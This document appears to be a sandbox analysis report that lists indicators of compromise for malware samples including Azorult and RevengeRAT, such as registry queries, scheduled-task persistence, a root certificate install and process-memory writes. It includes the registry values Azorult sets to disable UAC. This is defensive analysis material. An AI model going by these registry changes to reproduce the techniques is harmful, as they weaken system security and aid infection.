Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rfusclient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x0009000000023532-855.dat	nsis_installer_1
behavioral1/files/0x0009000000023532-855.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 6 IoCs

evasion

pid	Process
6724	timeout.exe
5340	timeout.exe
7932	timeout.exe
3600	timeout.exe
1132	timeout.exe
7628	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5080	ipconfig.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
2276	taskkill.exe
7256	taskkill.exe
7808	taskkill.exe
2408	taskkill.exe
7380	taskkill.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\MIME\Database	winit.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46	6AdwCleaner.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob = 040000000100000010000000a7f2e41606411150306b9ce3b49cb0c90f0000000100000014000000f45a0858c9cd920e647bad539ab9f1cfc77f24cb0b000000010000002a0000005300650063007400690067006f0020002800550054004e0020004f0062006a0065006300740029000000090000000100000022000000302006082b06010505070303060a2b0601040182370a030406082b060105050703086200000001000000200000006fff78e400a70c11011cd85977c459fb5af96a3df0540820d0f4b8607875e58f140000000100000014000000daed6474149c143cabdd99a9bd5b284d8b3cc9d81d0000000100000010000000f919b9ccce1e59c2e785f7dc2ccf67087e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d901030000000100000014000000e12dfb4b41d7d9c32b30514bac1d81d8385e2d46190000000100000010000000e843ac3b52ec8c297fa948c9b1fb281920000000010000006a040000308204663082034ea003020102021044be0c8b500024b411d3362de0b35f1b300d06092a864886f70d0101050500308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a656374301e170d3939303730393138333132305a170d3139303730393138343033365a308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a65637430820122300d06092a864886f70d01010105000382010f003082010a0282010100ceaa813fa3a36178aa31005595119e270f1f1cdf3a9b826830c04a611df12f0efabe79f7a523ef55519684cddbe3b96e3e31d80a2067c7f4d9bf94eb47043e02ce2aa25d870409f6309d188a97b2aa1cfc41d2a136cbfb3d91bae7d97035fae4e790c39ba39bd33cf5129977b1b709e068e61cb8f39463886a6afe0b76c9bef422e467b9ab1a5e77c18507dd0d6cbfee06c7776a419ea70fd7fbee9417b7fc85bea4abc41c31ddd7b6d1e4f0efdf168fb25293d7a1d489a1072ebfe10112421e1ae1d89534db647928ffba2e11c2e5e85b9248fb470bc26cdaad328341f3a5e54170fd65906dfafa51c4f9bd962b19042cd36da7dcf07f6f8365e26aab8786750203010001a381af3081ac300b0603551d0f0404030201c6300f0603551d130101ff040530030101ff301d0603551d0e04160414daed6474149c143cabdd99a9bd5b284d8b3cc9d830420603551d1f043b30393037a035a0338631687474703a2f2f63726c2e7573657274727573742e636f6d2f55544e2d5553455246697273742d4f626a6563742e63726c30290603551d250422302006082b0601050507030306082b06010505070308060a2b0601040182370a0304300d06092a864886f70d01010505000382010100081f52b1374478dbfdceb9da959698aa556480b55a40dd21a5c5c1f35f2c4cc8475a69eae8f03535f4d025f3c8a6a4874abd1bb17308bdd4c3cab635bb59867731cda78014ae13effcb148f96b25252d51b62c6d45c198c88a565d3eee434e3e6b278ed03a4b850b5fd3ed6aa775cbd15a872f3975135a72b002819fbef00f845420626c69d4e14dc60d9943010d12968c789dbf50a2b144aa6acf177acf6f0fd4f824555ff0341649663e5046c96371383162b862b9f353ad6cb52ba212aa194f09da5ee793c68e1408fef0308018a086854dc87dd78b03fe6ed5f79d16ac922ca023e59c91521f94df179473c3b3c1c17105200078bd13521da83ecd001fc8	6AdwCleaner.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob = 5c000000010000000400000000080000190000000100000010000000e843ac3b52ec8c297fa948c9b1fb2819030000000100000014000000e12dfb4b41d7d9c32b30514bac1d81d8385e2d4668000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d0000000100000010000000f919b9ccce1e59c2e785f7dc2ccf6708140000000100000014000000daed6474149c143cabdd99a9bd5b284d8b3cc9d86200000001000000200000006fff78e400a70c11011cd85977c459fb5af96a3df0540820d0f4b8607875e58f090000000100000022000000302006082b06010505070303060a2b0601040182370a030406082b060105050703080b000000010000002a0000005300650063007400690067006f0020002800550054004e0020004f0062006a00650063007400290000000f0000000100000014000000f45a0858c9cd920e647bad539ab9f1cfc77f24cb040000000100000010000000a7f2e41606411150306b9ce3b49cb0c920000000010000006a040000308204663082034ea003020102021044be0c8b500024b411d3362de0b35f1b300d06092a864886f70d0101050500308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a656374301e170d3939303730393138333132305a170d3139303730393138343033365a308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a65637430820122300d06092a864886f70d01010105000382010f003082010a0282010100ceaa813fa3a36178aa31005595119e270f1f1cdf3a9b826830c04a611df12f0efabe79f7a523ef55519684cddbe3b96e3e31d80a2067c7f4d9bf94eb47043e02ce2aa25d870409f6309d188a97b2aa1cfc41d2a136cbfb3d91bae7d97035fae4e790c39ba39bd33cf5129977b1b709e068e61cb8f39463886a6afe0b76c9bef422e467b9ab1a5e77c18507dd0d6cbfee06c7776a419ea70fd7fbee9417b7fc85bea4abc41c31ddd7b6d1e4f0efdf168fb25293d7a1d489a1072ebfe10112421e1ae1d89534db647928ffba2e11c2e5e85b9248fb470bc26cdaad328341f3a5e54170fd65906dfafa51c4f9bd962b19042cd36da7dcf07f6f8365e26aab8786750203010001a381af3081ac300b0603551d0f0404030201c6300f0603551d130101ff040530030101ff301d0603551d0e04160414daed6474149c143cabdd99a9bd5b284d8b3cc9d830420603551d1f043b30393037a035a0338631687474703a2f2f63726c2e7573657274727573742e636f6d2f55544e2d5553455246697273742d4f626a6563742e63726c30290603551d250422302006082b0601050507030306082b06010505070308060a2b0601040182370a0304300d06092a864886f70d01010505000382010100081f52b1374478dbfdceb9da959698aa556480b55a40dd21a5c5c1f35f2c4cc8475a69eae8f03535f4d025f3c8a6a4874abd1bb17308bdd4c3cab635bb59867731cda78014ae13effcb148f96b25252d51b62c6d45c198c88a565d3eee434e3e6b278ed03a4b850b5fd3ed6aa775cbd15a872f3975135a72b002819fbef00f845420626c69d4e14dc60d9943010d12968c789dbf50a2b144aa6acf177acf6f0fd4f824555ff0341649663e5046c96371383162b862b9f353ad6cb52ba212aa194f09da5ee793c68e1408fef0308018a086854dc87dd78b03fe6ed5f79d16ac922ca023e59c91521f94df179473c3b3c1c17105200078bd13521da83ecd001fc8	6AdwCleaner.exe

NTFS ADS 14 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\Azorult(6).exe:Zone.Identifier	firefox.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File created	C:\Users\Admin\Downloads\RevengeRAT.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\AdwereCleaner.exe:Zone.Identifier	firefox.exe
File created	C:\svchost\svchost.exe\:Zone.Identifier:$DATA	RegSvcs.exe
File created	C:\Users\Admin\Downloads\windows-xp-horror-edition-remake.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult(2).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult(3).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\RevengeRAT(1).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult(1).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult(5).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\AppData\Roaming\svchost.exe\:Zone.Identifier:$DATA	RegSvcs.exe
File created	C:\Users\Admin\Downloads\Azorult(4).exe:Zone.Identifier	firefox.exe

Runs .reg file with regedit 2 IoCs

pid	Process
7592	regedit.exe
5244	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4836	schtasks.exe
7548	schtasks.exe
5668	schtasks.exe
5328	schtasks.exe
7812	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
7964	Azorult.exe
7964	Azorult.exe
7964	Azorult.exe
7964	Azorult.exe
7964	Azorult.exe
7964	Azorult.exe
7964	Azorult.exe
7964	Azorult.exe
7964	Azorult.exe
7964	Azorult.exe
6724	rutserv.exe
6724	rutserv.exe
6724	rutserv.exe
6724	rutserv.exe
6724	rutserv.exe
6724	rutserv.exe
7672	rutserv.exe
7672	rutserv.exe
3724	rutserv.exe
3724	rutserv.exe
7720	rutserv.exe
7720	rutserv.exe
7720	rutserv.exe
7720	rutserv.exe
7720	rutserv.exe
7720	rutserv.exe
5972	rfusclient.exe
5972	rfusclient.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe
7504	winit.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
5940	taskhostw.exe
7544	Windows XP Horror Edition.exe
5732	Windows XP Horror Edition.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
636	Process not Found
636	Process not Found
636	Process not Found

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
6040	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	1512	firefox.exe
Token: SeDebugPrivilege	1512	firefox.exe
Token: SeDebugPrivilege	5252	RevengeRAT(1).exe
Token: SeDebugPrivilege	5400	RegSvcs.exe
Token: SeDebugPrivilege	2432	6AdwCleaner.exe
Token: SeDebugPrivilege	5760	svchost.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1236	RegSvcs.exe
Token: SeDebugPrivilege	1512	firefox.exe
Token: SeDebugPrivilege	1512	firefox.exe
Token: SeDebugPrivilege	1512	firefox.exe
Token: 33	5424	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5424	AUDIODG.EXE
Token: SeDebugPrivilege	6312	svchost.exe
Token: SeDebugPrivilege	6300	RegSvcs.exe
Token: SeDebugPrivilege	1512	firefox.exe
Token: SeDebugPrivilege	6724	rutserv.exe
Token: SeDebugPrivilege	3724	rutserv.exe
Token: SeTakeOwnershipPrivilege	7720	rutserv.exe
Token: SeTcbPrivilege	7720	rutserv.exe
Token: SeTcbPrivilege	7720	rutserv.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeDebugPrivilege	7256	taskkill.exe
Token: SeDebugPrivilege	7528	powershell.exe
Token: SeDebugPrivilege	7808	taskkill.exe
Token: SeAuditPrivilege	7960	svchost.exe
Token: SeDebugPrivilege	1592	RDPWInst.exe
Token: SeAuditPrivilege	7392	svchost.exe
Token: SeDebugPrivilege	2408	taskkill.exe
Token: SeDebugPrivilege	7380	taskkill.exe
Token: SeDebugPrivilege	1512	firefox.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe

Suspicious use of SetWindowsHookEx 39 IoCs

pid	Process
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
2432	6AdwCleaner.exe
2432	6AdwCleaner.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
1512	firefox.exe
7964	Azorult.exe
8152	wini.exe
7504	winit.exe
6724	rutserv.exe
7672	rutserv.exe
3724	rutserv.exe
7720	rutserv.exe
8032	cheat.exe
3828	ink.exe
7628	taskhost.exe
7824	P.exe
4640	R8.exe
7544	Windows XP Horror Edition.exe
7544	Windows XP Horror Edition.exe
7544	Windows XP Horror Edition.exe
8060	winlogon.exe
5940	taskhostw.exe
7764	winlogon.exe
5732	Windows XP Horror Edition.exe
5732	Windows XP Horror Edition.exe
5732	Windows XP Horror Edition.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3180 wrote to memory of 1512	3180	firefox.exe	84
PID 3180 wrote to memory of 1512	3180	firefox.exe	84
PID 3180 wrote to memory of 1512	3180	firefox.exe	84
PID 3180 wrote to memory of 1512	3180	firefox.exe	84
PID 3180 wrote to memory of 1512	3180	firefox.exe	84
PID 3180 wrote to memory of 1512	3180	firefox.exe	84
PID 3180 wrote to memory of 1512	3180	firefox.exe	84
PID 3180 wrote to memory of 1512	3180	firefox.exe	84
PID 3180 wrote to memory of 1512	3180	firefox.exe	84
PID 3180 wrote to memory of 1512	3180	firefox.exe	84
PID 3180 wrote to memory of 1512	3180	firefox.exe	84
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 1972	1512	firefox.exe	85
PID 1512 wrote to memory of 2588	1512	firefox.exe	86
PID 1512 wrote to memory of 2588	1512	firefox.exe	86
PID 1512 wrote to memory of 2588	1512	firefox.exe	86
PID 1512 wrote to memory of 2588	1512	firefox.exe	86
PID 1512 wrote to memory of 2588	1512	firefox.exe	86
PID 1512 wrote to memory of 2588	1512	firefox.exe	86
PID 1512 wrote to memory of 2588	1512	firefox.exe	86
PID 1512 wrote to memory of 2588	1512	firefox.exe	86

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

